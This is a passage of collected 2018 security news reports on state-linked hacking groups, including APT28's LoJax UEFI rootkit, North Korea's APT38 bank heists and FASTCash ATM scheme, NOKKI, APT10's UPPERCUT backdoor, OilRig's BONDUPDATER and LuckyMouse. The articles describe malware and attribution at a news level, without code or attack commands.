According to experts from Symantec, the group is now actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.
Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.
“After receiving an unprecedented amount of attention in 2016, APT28 has continued to mount operations during 2017 and 2018. However, the group’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering.” reads the analysis published by Symantec.
“The organizations targeted by APT28 during 2017 and 2018 include:
A well-known international organization
Military targets in Europe
Governments in Europe
A government of a South American country
An embassy belonging to an Eastern European country”
The cyberespionage group used several malware and hacking tools from its arsenal, including the Sofacy backdoor, the in composed of two main components; the Trojan.Sofacy (aka Seduploader) used for basic reconnaissance and the Backdoor.SofacyX (aka X-Agent) which was used as a second stage info-stealing malware.
The APT group is also using the recently discovered Lojax UEFI rootkit that allows the attackers to maintain persistence on the infected machine even if the operating system is reinstalled and the hard drive is replaced.
Symantec researchers also highlighted possible links to other espionage operations, including the Earworm that has been active since at least May 2016 and is involved intelligence-gathering operations against military targets in Europe, Central Asia, and Eastern Asia.
The Earworm group carried out spear-phishing campaigns aimed at delivering the Trojan.Zekapab downloader and the Backdoor.Zekapab.
Experts noticed some overlap with the command and control infrastructures used by Earworm and APT28.
“During 2016, Symantec observed some overlap between the command and control (C&C) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe (the U.S. government code name for APT28 and related actors), implying a potential connection between Earworm and APT28. However, Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group.” continues the report.
The information gathered by Symantec demonstrates that APT28 is still very active and continues to change Techniques, Tactics, and Procedures (TTPs) to remain under the radar.
North Korean Attacks on Banks Attributed to 'APT38' Group
5.10.2018 securityweek APT
A report published on Wednesday by FireEye details the activities of a financially motivated threat actor believed to be operating on behalf of the North Korean government.
The group, tracked by FireEye as APT38, focuses on targeting financial institutions, and the company’s researchers estimate that it has stolen at least a hundred million dollars from banks worldwide. It’s believed that the group has attempted to steal over $1.1 billion.
Much of the North Korea-linked cyber activity has been attributed to the notorious Lazarus, but cybersecurity firms have begun to realize that, similar to other countries, there are actually several groups that appear to be launching attacks on behalf of the government. The fact that their tools, techniques and infrastructure often overlap makes it difficult to accurately attribute an operation to a certain group.
FireEye noted that there are many similarities between APT38 and attacks launched by other North Korea-linked groups, including Lazarus and the activity it tracks as TEMP.Hermit. However, it believes APT38’s tools and its tactics, techniques and procedures (TTPs) are distinct enough for it to be tracked separately.
Some other security firms have also noticed that the financially motivated attacks linked to Lazarus may have actually been carried out by a subgroup of Lazarus. Kaspersky has tracked this subgroup as Bluenoroff, while CrowdStrike has dubbed it Stardust Chollima. CrowdStrike has been tracking a total of four subgroups, which it has named Stardust Chollima, Silent Chollima, Labyrinth Chollima and Ricochet Chollima.
According to FireEye, APT38 has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries – researchers believe the actual number of targets may be higher.
Several of these attacks made headlines in the past years and the researchers who analyzed them reported seeing significant similarities to Lazarus campaigns. However, FireEye says the attacks were actually carried out by APT38. The attacks, many of which targeted the SWIFT banking system, were aimed, among others, at Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile also in 2018.
“Attribution to both the ‘Lazarus’ group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations,” FireEye said in its report on APT38. “Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”
FireEye believes that several other attacks that made the news – involving banks in Africa, Vietnam, Malaysia, the Philippines, Ecuador, and India – may have also been carried out by APT38 based on timing, location, malware, general TTPs and the fact that they targeted SWIFT systems.
Unlike other North Korean threat groups, APT38’s attacks are almost exclusively cyber heists whose likely goal is to raise money for the regime. On the other hand, unlike typical cybercrime operations, APT38’s campaigns are more similar to espionage.
“APT38 executes sophisticated bank heists typically featuring long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards,” FireEye said.
Experts believe APT38 was created by North Korea as a result of the sanctions imposed on the country. The group was first spotted in February 2014, roughly one year after the UN blocked the regime from making bulk cash transfers and restricting its ties to international banking systems. As more and more sanctions were imposed on North Korea in the following years, APT38 escalated its activities and the frequency of attacks increased.
FireEye has warned that APT38 continues to be active, even after the United States named and charged an alleged North Korean hacker who is said to have been involved in the development of Lazarus tools.
Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
4.10.2018 securityaffairs APT
A joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” used by Hidden Cobra APT.
The US-CERT has released a joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.
According to the report published by the US-CERT, Hidden Cobra has been using the FASTCash technique since at least 2016, the APT group targets bank infrastructure to cash out ATMs.
Government experts analyzed 10 samples of malware involved in FASTCash attacks, state-sponsored hackers used them to compromise payment “switch application servers” within the targeted banks to facilitate fraudulent transactions.
“FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation.” states the report.
“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.”
Switch application server communicates with the core banking system to validate user’s bank account details for a requested transaction.
HIDDEN COBRA attackers deployed legitimate scripts on compromised switch application servers to intercept and reply to financial request messages with fraudulent but legitimate-looking affirmative response messages.
Experts noticed that all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions.
At the time, the infection vector is still unknown, anyway, there are no evidence attackers successfully exploited the AIX operating system in these incidents.
“HIDDEN COBRA actors exploited the targeted systems by using their knowledge of International Standards Organization (ISO) 8583—the standard for financial transaction messaging—and other tactics.” continues the report.
“HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages.”
Most accounts used to initiate the transactions had a minimal activity or zero balances.
The FASTCash cash-out scheme was used to target banks in Africa and Asia, while U.S. authorities are still investigating incidents in the country that may be linked with this technique.
Experts believe APT threat actors carried out spear-phishing attacks against the bank, malicious messages used Windows executable.
The malicious code was used for lateral movements aimed at deploying malware onto the payment switch application server.
US-CERT provided mitigation recommendations for Institutions with Retail Payment Systems, including the implementation of two-factor authentication for any access to the switch application server.
Further details, including IoCs, are reported in the alert.
APT38 is behind financially motivated attacks carried out by North Korea
4.10.2018 securityaffairs APT
Security experts from FireEye published a report on the activity of financially motivated threat actors, tracked as APT38, linked to the North Korean government.
The attacks aimed at financial institutions, FireEye estimates APT38 has stolen at least a hundred million dollars from banks worldwide.
APT38 appears to be a North Korea-linked group separate from the infamous Lazarus group, it has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries.
The report attributed the string of attacks against the SWIFT banking system to the APT38, including the hack of Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile in 2018.
“APT38 is a financially motivated group linked to North Korean cyber espionage operators, renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware.” reads the report published by FireEye.
“Attribution to both the “Lazarus” group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations. Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”
According to FireEye, the APT38 was targeting banks worldwide to allows the North Korean government to obtain new cash bypassing sanctions imposed on Pyongyang by foreign states.
“Based on observed activity, we judge that APT38’s primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime. Increasingly heavy and pointed international sanctions have been levied on North Korea following the regime’s continued weapons development and testing.” continues the report.
“The pace of APT38 activity probably reflects increasingly desperate efforts to steal funds to pursue state interests, despite growing economic pressure on Pyongyang.”
Experts believe the activity of the group will continue in the future, likely adopting new sophisticated tactics to avoid detection.
“Based on the large scale of resources and vast network dedicated to compromising targets and stealing funds over the last few years, we believe APT38’s operations will continue in the future,” concludes FireEye.
“In particular, the number of SWIFT heists that have been ultimately thwarted in recent years coupled with growing awareness for security around the financial messaging system could drive APT38 to employ new tactics to obtain funds especially if North Korea’s access to currency continues to deteriorate.”
NKorea Said to Have Stolen a Fortune in Online Bank Heists
4.10.2018 securityweek APT
North Korea’s nuclear and missile tests have stopped, but its hacking operations to gather intelligence and raise funds for the sanction-strapped government in Pyongyang may be gathering steam.
U.S. security firm FireEye raised the alarm Wednesday over a North Korean group that it says has stolen hundreds of millions of dollars by infiltrating the computer systems of banks around the world since 2014 through highly sophisticated and destructive attacks that have spanned at least 11 countries. It says the group is still operating and poses “an active global threat.”
It is part of a wider pattern of malicious state-backed cyber activity that has led the Trump administration to identify North Korea — along with Russia, Iran and China — as one of the main online threats facing the United States. Last month, the Justice Department charged a North Korean hacker said to have conspired in devastating cyberattacks, including an $81 million heist of Bangladesh’s central bank and the WannaCry virus that crippled parts of Britain’s National Health Service.
On Tuesday, the U.S. Department of Homeland Security warned of the use of malware by Hidden Cobra, the U.S. government’s byword for North Korea hackers, in fraudulent ATM cash withdrawals from banks in Asia and Africa. It said that Hidden Cobra was behind the theft of tens of millions of dollars from teller machines in the past two years. In one incident this year, cash had been simultaneously withdrawn from ATMs in 23 different countries, it said.
North Korea, which prohibits access to the world wide web for virtually all its people, has previously denied involvement in cyberattacks, and attribution for such attacks is rarely made with absolute certainty. It is typically based on technical indicators such as the Internet Protocol addresses that identify computers and characteristics of the coding used in malware, which is the software a hacker may use to damage or disable computers.
But other cybersecurity experts tell The Associated Press that they also see continued signs that North Korea’s authoritarian government, which has a long track record of criminality to raise cash, is conducting malign activity online. That activity includes targeting of financial institutions and crypto-currency-related organizations, as well as spying on its adversaries, despite the easing of tensions between Pyongyang and Washington.
“The reality is they are starved for cash and are continuing to try and generate revenue, at least until sanctions are diminished,” said Adam Meyers, vice president of intelligence at CrowdStrike. “At the same time, they won’t abate in intelligence collection operations, as they continue to negotiate and test the international community’s resolve and test what the boundaries are.”
CrowdStrike says it has detected continuing North Korean cyber intrusions in the past two months, including the use of a known malware against a potentially broad set of targets in South Korea, and a new variant of malware against users of mobile devices that use a Linux-based operating system.
This activity has been taking place against the backdrop of a dramatic diplomatic shift as Kim Jong Un has opened up to the world. He has held summits with South Korean President Moon Jae-in and with President Donald Trump, who hopes to persuade Kim to relinquish the nuclear weapons that pose a potential threat to the U.S. homeland. Tensions on the divided Korean Peninsula have dropped and fears of war with the U.S. have ebbed. Trump this weekend will dispatch his top diplomat, Mike Pompeo, to Pyongyang for the fourth time this year to make progress on denuclearization.
But North Korea has yet to take concrete steps to give up its nuclear arsenal, so there’s been no let-up in sanctions that have been imposed to deprive it of fuel and revenue for its weapons programs, and to block it from bulk cash transfers and accessing to the international banking system.
FireEye says APT38, the name it gives to the hacking group dedicated to bank theft, has emerged and stepped up its operations since February 2014 as the economic vise on North Korea has tightened in response to its nuclear and missile tests. Initial operations targeted financial institutions in Southeast Asia, where North Korea had experience in money laundering, but then expanded into other regions such as Latin America and Africa, and then extended to Europe and North America.
In all, FireEye says APT38 has attempted to steal $1.1 billion, and based on the data it can confirm, has gotten away with hundreds of millions in dollars. It has used malware to insert fraudulent transactions in the Society for Worldwide Interbank Financial Telecommunication or SWIFT system that is used to transfer money between banks. Its biggest heist to date was $81 million stolen from the central bank of Bangladesh in February 2016. The funds were wired to bank accounts established with fake identities in the Philippines. After the funds were withdrawn they were suspected to have been laundered in casinos.
The Foundation for Defense of Democracies, a Washington think tank, said in a report Wednesday that North Korea’s cyber capabilities provide an alternative means for challenging its adversaries. While Kim’s hereditary regime appears to prioritize currency generation, attacks using the SWIFT system raise concerns that North Korean hackers “may become more proficient at manipulating the data and systems that undergird the global financial system,” it says.
Sandra Joyce, FireEye’s head of global intelligence, said that while APT38 is a criminal operation, it leverages the skills and technology of a state-backed espionage campaign, allowing it to infiltrate multiple banks at once and figure how to extract funds. On average, it dwells in a bank’s computer network for 155 days to learn about its systems before it tries to steal anything. And when it finally pounces, it uses aggressive malware to wreak havoc and cover its tracks.
“We see this as a consistent effort, before, during and after any diplomatic efforts by the United States and the international community,” said Joyce, describing North Korea as being “undeterred” and urging the U.S. government to provide more specific threat information to financial institutions about APT38′s modus operandi. APT stands for Advanced Persistent Threat.
The Silicon Valley-based company says it is aware of continuing, suspected APT38 operations against other banks. The most recent attack it is publicly attributing to APT38 was against of Chile’s biggest commercial banks, Banco de Chile, in May this year. The bank has said a hacking operation robbed it of $10 million.
FireEye, which is staffed with a roster of former military and law-enforcement cyberexperts, conducted malware analysis for a criminal indictment by the Justice Department last month against Park Jin Hyok, the first time a hacker said to be from North Korea has faced U.S. criminal charges. He’s accused of conspiring in a number of devastating cyberattacks: the Bangladesh heist and other attempts to steal more than $1 billion from financial institutions around the world; the 2014 breach of Sony Pictures Entertainment; and the WannaCry ransomware virus that in 2017 infected computers in 150 countries.
Researchers associated the recently discovered NOKKI Malware to North Korean APT
3.10.2018 securityaffairs APT
Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to North Korea-Linked APT.
Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI. that was attributed to North Korea-linked attackers.
NOKKI borrows the code from the KONNI malware, the latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically-motivated victims in Eurasia and Southeast Asia.
“KONNI,” was undetected for more than 3 years, it was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.
The NOKKI variant has been in use since at least January 2018, experts attributed it to the Reaper group.
“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by the Palo Alto Networks.
“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”
NOKKI is able to gather a broad range of data (i.e. IP address, Hostname, Username, Drive Information, Operating System Information, Installed Programs) from the infected systems, it is also able to fetch and execute a payload, as well as to drop and open decoy documents.
The malicious code writes the collected information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.
In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters and Russia with documents written Cyrillic featuring content related to local political issues.
A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.
The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware, they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.
“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.
“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”
The VBScript file used the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy that in turn downloads a strain of the DOGCALL malware.
The malware implements backdoor features, can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.
The malware connects the command and control (C&C) via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.
“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.
“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,”
Russian Cyberspies Use UEFI Rootkit in Attacks
27.9.2018 securityweek APT CyberSpy
Russian cyber-espionage group Fancy Bear is the first threat actor to have used a Unified Extensible Firmware Interface (UEFI) rootkit in a malicious campaign, ESET’s security researchers claim.
Several years ago, Italy-based surveillance software maker Hacking Team was said to have used a UEFI rootkit to ensure the persistence of its software on targeted systems, but no UEFI rootkit had “ever been detected in the wild,” the security firm claims.
A recently discovered Fancy Bear campaign, however, changes that: the actor was able to successfully deploy a malicious UEFI module on a victim’s system. Not only does this prove that UEFI rootkits are a real threat, but also shows that Fancy Bear may be even more dangerous than thought, ESET says.
Active for the past decade and a half, the actor, which is also referred to as APT28, Strontium, Sofacy and Sednit, is believed to have orchestrated a variety of high profile attacks, such as the DNC hack before the US 2016 elections.
Earlier this year, after the group’s Zerbrocy malware was found on systems infected with Turla’s Mosquito backdoor, security researchers concluded that the threat actor’s activities overlap with other state-sponsored operations.
“Our investigation has determined that this malicious actor was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory. This module is able to drop and execute malware on disk during the boot process. This persistence method is particularly invasive as it will not only survive an OS reinstall, but also a hard disk replacement,” ESET reveals in a report published today.
In May, Fancy Bear was revealed to have abused LoJack (a Trojanized version of the tool, which ESET calls LoJax) in their attacks. Deeper analysis of the campaign revealed not only that the actor attempted to mimic the tool’s persistence method, but also that additional tools were used for accessing and modifying UEFI/BIOS settings.
These include a kernel driver and three tools to (1) dump information about low level system settings, (2) save an image of the system firmware, and (3) add a malicious UEFI module to the image. The third tool would then write the modified firmware image back to the SPI flash memory, thus effectively installing the UEFI rootkit on the system.
“If the platform allows write operations to the SPI flash memory, it will just go ahead and write to it. If not, it actually implements an exploit against a known vulnerability,” ESET reveals.
The UEFI rootkit was designed to drop malware onto the Windows operating system partition and make sure that it is executed at startup.
The observed LoJax samples used command and control (C&C) servers previously associated with Fancy Bear’s SedUploader first-stage backdoor, which, combined with the presence of other Sednit tools on LoJax-infected machines (SedUploader, XAgent backdoor, and Xtunnel network proxy tool), suggested that this threat actor was behind the attacks.
Sednit’s UEFI rootkit, ESET discovered, is not properly signed, meaning that Secure Boot would be able to block it. The security researchers also note that the attack can write the modified firmware image only if SPI flash memory protections are vulnerable or misconfigured.
“The LoJax campaign shows that high-value targets are prime candidates for the deployment of rare, even unique threats and such targets should always be on the lookout for signs of compromise. Also, one thing that this research taught us is that it is always important to dig as deep as you can go!” ESET concludes.
Russian Sednit APT used the first UEFI rootkit of ever in attacks in the wild
27.9.2018 securityaffairs APT
Security experts from ESET have spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.
Security researchers from ESET have discovered a new piece of a sophisticated malware used by the Russia-linked Sednit group (aka Fancy Bear, APT28, Pawn Storm, Sofacy Group, and STRONTIUM) in targeted attacks aimed at government entities in the Balkans as well as in Central and Eastern Europe.
The malicious code tracked as LoJax is considered the first UEFI rootkit used in attacks in the wild.
Security experts have debated for a long about UEFI rootkits that are very dangerous malware hard to detect and that could resist to the operating system reinstallation and even to the hard disk replacement.
“The discovery of the first in-the-wild UEFI rootkit is notable for two reasons.” reads the analysis published by ESET.
“First, it shows that UEFI rootkits are a real threat, and not merely an attractive conference topic.
And second, it serves as a heads-up, especially to all those who might be in the crosshairs of Sednit. This APT group, also known as APT28, STRONTIUM, Sofacy and Fancy Bear, may be even more dangerous than previously thought.”
The Sednit APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
The discovery marks a milestone in the evolution of the group, it represents an escalation in the complexity of its attacks, the cyber capabilities of the group may be even more dangerous than previously thought.
The LoJax UEFI rootkit borrows a portion of the code of the anti-theft software LoJack.
LoJack for laptops is a security software designed to catch computer thieves, but it could be theoretically abused to spy on legitimate owners of the device.
LoJack could be used to locate a stolen laptop, lock it or wipe its content, it is a precious application for enterprises that want to implement an additional protection of their assets.
Early this year, experts from Arbor Networks discovered several LoJack agents that were found to be connecting to servers that are believed to be controlled by the notorious Russia-linked Fancy Bear APT group.
“ASERT recently discovered Lojack agents containing malicious C2s. These hijacked agents pointed to suspected Fancy Bear (a.k.a. APT28, Pawn Storm) domains.” reads the report published by Netscout.
“ASERT has identified five Lojack agents (rpcnetp.exe) pointing to 4 different suspected domains. Fancy Bear has been tied to three of the domains in the past.”
Five LoJack agents discovered by the experts were pointing to four C&C servers, three of which have been associated with past campaigns conducted by the Fancy Bear APT group.
LoJax exhibits rootkit-like capabilities, it is implemented as a UEFI/BIOS module to survive to the OS reinstallation and hard drive replacement.
“Since this software’s intent is to protect a system from theft, it is important that it resists OS re-installation or hard drive replacement.” continues the report.
“Thus, it is implemented as a UEFI/BIOS module, able to survive such events. This solution comes pre-installed in the firmware of a large number of laptops manufactured by various OEMs, waiting to be activated by their owners.”
The researchers from ESET revealed that the APT group was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory.
The module was abused to drop and execute the malicious code on disk during the boot process. The only way to remove the malware is reflashing the UEFI firmware
Moreover, cleaning a system’s UEFI firmware means re-flashing it, an operation not commonly done and certainly not by the typical user.
Experts linked the attacks to Sednit hackers thanks to the analysis of the code and the identification of the Command and Control infrastructure.
“As mentioned above, some of the LoJax small agent C&C servers were used in the past by SedUploader, a first-stage backdoor routinely used by Sednit’s operators. Also, in cases of LoJax compromise, traces of other Sednit tools were never far away.” concludes the report.
“In fact, systems targeted by LoJax usually also showed signs of these three examples of Sednit malware:
SedUploader, a first-stage backdoor
XAgent, Sednit’s flagship backdoor
Xtunnel, a network proxy tool that can relay any kind of network traffic between a C&C server on the Internet and an endpoint computer inside a local network
These facts allow us to attribute LoJax with high confidence to the Sednit group.”
The full list of Indicators of Compromise (IOCs) and samples was shared by ESET on GitHub.
China-linked APT10 group behind new attacks on the Japanese media sector
17.9.2018 securityaffairs APT
Recently researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector
In July, security researchers from FireEye uncovered and blocked a campaign carried out by Chinese APT10 group (aka Menupass, and Stone Panda) aimed at Japanese media sector.
Experts noticed the group since around mid-2016 when it was using PlugX, ChChes, Quasar and RedLeaves malware in targeted attacks.
The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.
In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.
The ANEL malware was already seen in the previous attack as a beta version or release candidate.
The spear phishing emails have an unreadable content and use titles related to maritime, diplomatic, and North Korean issues. The body of the messages includes a password to use to see the password-protected document.
The analysis of the UPPERCUT samples revealed that their timestamps were overwritten and filled with zeroes. The experts pointed out the lack of visibility into the UPPERCUT 5.2.x series, but they speculated that minor versions might have been released every few months between December 2017 and May 2018.
“The compile time of loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.” states the report.
“Unlike previous versions, the exported function names are randomized in the latest version”
The latest version also implements another new feature, it sends an error code in the Cookie header when failing to receive the HTTP response from the command and control (C&C) server.
The malicious code support several commands such as:
The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.
“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving,” FireEye concludes.
“In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware,”
China-linked APT10 Hackers Update Attack Techniques
15.9.2018 securityweek APT
Recently attacks launched by the China-linked threat actor APT10 against the Japanese media sector revealed the use of updated tactics, techniques and procedures (TTPs), FireEye says.
Also known as menuPass and Stone Panda, which FireEye has been tracking since 2009, the group has a history of targeting Japanese entities. Last year, the group targeted entities in at least fourteen countries, including the website of a prominent U.S. trade association.
As part of the new attacks, spear-phishing emails carrying malicious Word documents that attempt to deliver the UPPERCUT backdoor. Known in the security community as ANEL, the malware was apparently in pre-release form (beta or release candidate) until recently, FireEye’s security researchers say.
The documents carry a malicious VBA macro and use Japanese titles related to maritime, diplomatic, and North Korean issues (but have unreadable contents). The documents were password protected, with the password provided in the email body.
Recent UPPERCUT samples have the timestamps overwritten and filled with zeroes and the security researchers do not have visibility into the UPPERCUT 5.2.x series, but say that minor versions might have been released every few months between December 2017 and May 2018.
The latest version also features randomized exported function names and was observed sending an error code in the Cookie header when failing to receive the HTTP response from the command and control (C&C) server. For each C&C address, the malware now has uniquely hard-coded keys it uses for encryption.
Furthermore, in the generated network traffic, the encoded proxy information has been added in the URL query values during the C&C communication, FireEye said.
The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.
“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware,” FireEye concludes.
Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
14.9.2018 securityaffairs APT
Researchers from the Unit42 at Palo Alto Networks observed Iran-Linked OilRig APT group targeting high-ranking office in a Middle Eastern nation
The Iran-linked APT group OilRig continues to very active, it continues to improve the weapons in its arsenal.
The OilRig hacker group has been around since at least 2015, since then it targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.
The OilRig APT group was recently observed using a new variant of the OopsIE Trojan that implements news evasion capabilities.
Now researchers from Palo Alto Networks’s Unit 42 have uncovered a new campaign attributed to the group that targeted members of an undisclosed government in the Middle East with an evolved variant of the BondUpdater trojan.
In mid-August, the state-sponsored hackers launched a highly targeted spear-phishing email to a high-ranking office in a Middle Eastern nation.
“In August 2018, Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER. BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization.” reads the analysis published by Palo Alto Networks.
“The spear-phishing email had an attached Microsoft Word document that contained a macro responsible for installing a new variant of BONDUPDATER.”
The hackers used spear-phishing emails to deliver an updated version of the PowerShell-based BondUpdater Trojan. The BONDUPDATER Trojan supports implements common backdoor features such as uploading and downloading files, as well as executing commands on the infected system.
“The BondUpdater trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands,” continues the analysis published by Palo alto Networks.
“BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.”
The spear-phishing messages use a weaponized document with a macro responsible for downloading and executing a new variant of BondUpdater.
The macro runs the VBScript “AppPool.vbs” that creates a scheduled task that is execute every minute to ensure persistence to the BONDUPDATER Trojan.
The malware checks that only one instance of it is running at one time, it also locks files to determine how long the main PowerShell process has been executing.
If the main PowerShell process has been running for more than 10 minutes, the script will stop the process and delete the lock file to allow future execution of the PowerShell script.
“Future executions of the PowerShell script will fully execute as the lock file will no longer exist on the system. This suggests the threat actors may have experienced issues with this Trojan running for extended periods in the past, likely related to the communication loops that we will discuss later.” continues the experts.
OilRig APT
The BONDUPDATER Trojan also includes a new TXT-based C2 communication option, the malware includes two different variations of the DNS tunneling protocol, one using DNS A records, and one using DNS TXT records to transmit data from the command & control to the trojan.
“As expected, OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East. Sometimes developing new tools, OilRig also often uses what has worked in the past, including developing variants of previously used tools and malware. This reduces development time and capitalizes on previous versions of the tool and its success.” concluded Palo Alto Networks.
If you are interested in the indicators of Compromise (IoCs), give a look at the analysis published by Palo Alto Networks.
Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
11.9.2018 securityaffairs APT
Security experts observed the LuckyMouse APT group using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.
Security experts from Kaspersky have observed the LuckyMouse APT group (aka Emissary Panda, APT27 and Threat Group 3390) using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.
The APT group has been active since at least 2010, the crew targeted U.S. defense contractors and financial services firms worldwide.
In March 2018, security experts at Kaspersky Lab have observed an attack powered by the Chinese APT group, the experts speculate the campaign was started in the fall of 2017. The attack hit a national data center in an unnamed country in Central Asia, according to Kaspersky, the hackers were preparing a watering hole attack. The hackers attempted to inject malicious JavaScript code into the government websites connected to the data center.
Over the past months, the group used the network filtering driver NDISProxy to inject a previously unknown Trojan into the lsass.exe system process memory.
Kaspersky reported that the driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, experts immediately notified it to the firm.
